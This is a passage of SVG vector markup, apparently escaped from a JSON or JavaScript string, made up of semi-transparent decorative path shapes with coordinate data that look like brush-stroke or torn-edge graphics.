d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path 